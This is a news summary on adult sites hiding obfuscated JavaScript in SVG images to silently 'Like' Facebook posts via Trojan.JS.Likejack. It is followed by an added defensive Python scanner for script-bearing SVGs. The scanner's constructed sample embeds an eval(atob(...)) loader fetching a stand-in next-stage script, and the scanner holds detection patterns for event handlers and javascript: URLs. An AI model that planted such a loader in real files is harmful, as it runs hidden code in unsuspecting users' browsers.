Adult sites are stashing exploit code inside racy .svg files
Briefly

A malicious script, Trojan.JS.Likejack, is designed to download additional obfuscated JavaScript that enables it to automatically 'Like' a Facebook post while a user is logged in. This silent activity occurs without the user's awareness. The misuse of the .svg format in malicious contexts has been observed before, including in phishing attacks that trick users into revealing their credentials by displaying fake login screens. Malwarebytes reported that numerous adult sites abuse .svg files for manipulating likes, often returning under new accounts when shut down by Facebook.
Once decoded, the script causes the browser to download a chain of additional obfuscated JavaScript. The final payload, a known malicious script called Trojan.JS.Likejack, induces the browser to like a specified Facebook post as long as a user has their account open.
This Trojan, also written in JavaScript, silently clicks a 'Like' button for a Facebook page without the user's knowledge or consent, in this case the adult posts we found above.
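As an added defensive example, not code from the Ars Technica or Malwarebytes reporting: a small Python scanner that flags the SVG features the chain described above depends on, namely an embedded script element, event-handler attributes such as onload, javascript: hrefs, and long base64 runs that a loader would decode before running. The sample SVGs, the eval(atob(...)) loader shape and the example.invalid URL are constructed for the demonstration.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)          # onload, onclick, ...
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")     # long base64-looking run

def decode_blob(blob: str) -> str:
    """Best-effort base64 decode; returns '' when the run is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""

def scan_svg(svg_text: str) -> list:
    """Return findings for content that makes an SVG execute code when rendered."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        tag = el.tag.split("}")[-1].lower()
        if tag == "script":
            findings.append("script element")
            src = el.get("href") or el.get(XLINK_HREF)
            if src:
                findings.append(f"external script: {src}")
            for blob in B64_RUN.findall(el.text or ""):
                findings.append("base64 run inside script")
                if decoded := decode_blob(blob):
                    findings.append(f"decodes to: {decoded[:24]!r}")
        for name, value in el.attrib.items():
            local = name.split("}")[-1]
            if EVENT_ATTR.match(local):
                findings.append(f"event handler {local} on <{tag}>")
            elif local == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
    return findings

# Constructed samples: a plain image and an image carrying a staged loader.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
STAGE = b'/* constructed stand-in for a next-stage loader */ fetch("https://example.invalid/stage2.js")'
MALICIOUS_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" onload="init()"><rect width="9" height="9"/>'
    '<script>eval(atob("' + base64.b64encode(STAGE).decode() + '"))</script></svg>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("suspicious", MALICIOUS_SVG)):
        print(label, scan_svg(doc) or ["no script content"])
```

Serving uploaded SVGs with an image content type and a restrictive Content-Security-Policy, or stripping script content on upload, removes the execution path the scanner flags.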
In 2023, pro-Russian hackers used an .svg tag to exploit a cross-site scripting bug in Roundcube, a server application that was used by more than 1,000 webmail services and millions of their end users.
Researchers documented a phishing attack that used an .svg file to open a fake Microsoft login screen with the target's email address already filled in.
Read at Ars Technica